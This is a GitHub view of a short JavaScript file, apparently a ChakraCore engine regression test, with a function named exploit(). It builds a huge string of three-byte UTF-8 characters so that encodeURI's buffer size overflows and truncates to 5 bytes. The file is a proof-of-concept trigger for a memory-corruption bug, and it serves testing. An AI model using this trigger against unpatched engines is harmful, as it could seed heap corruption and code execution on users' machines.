Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

Expand file tree

/

encodeoverflow.js

Copy path
More file actions
More file actions

Latest commit

 

History

History
History
63 lines (52 loc) · 1.68 KB
/

encodeoverflow.js

File metadata and controls

63 lines (52 loc) · 1.68 KB
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
function get_n_copies_of(ch, n)
{
var powers = new Array();
powers[0] = ch;
for (var i = 1; (1<<i) < n; i++)
{
powers[i] = powers[i-1] + powers[i-1];
}
var out = '';
for (var i = powers.length-1; i >= 0; i--)
{
if ((1 << i) > n)
continue;
out += powers[i];
n -= (1 << i);
}
return out;
}
function exploit()
{
// The choice of character is somewhat important -- we need
// something that expands out to 3 bytes in UTF-8 encoding.
// In this case, U+20AC satisfies that requirement.
var s1 = "\u20ac";
var ss;
try
{
ss = get_n_copies_of(s1, 477218589);
}
catch (e)
{
WScript.Echo("You don't have enough free memory or VA to run this -- you'll need as much as possible.");
return;
}
WScript.Echo("SS length = " + ss.length + "<br/>");
// encodeURI sums (3 * [number of UTF-8 bytes required]) for each character
// Since we use a char with 3 bytes required, that means the encodeURI memory
// allocation is 3 * 3 * 477218589 = 0x100000005.
// This truncates when fit into a ulong to just 5.
WScript.Echo(encodeURI(ss).length);
}
try {
exploit();
}
catch (e)
{
WScript.Echo("Message: " + e.message);
}
Morty Proxy This is a proxified and sanitized view of the page, visit original site.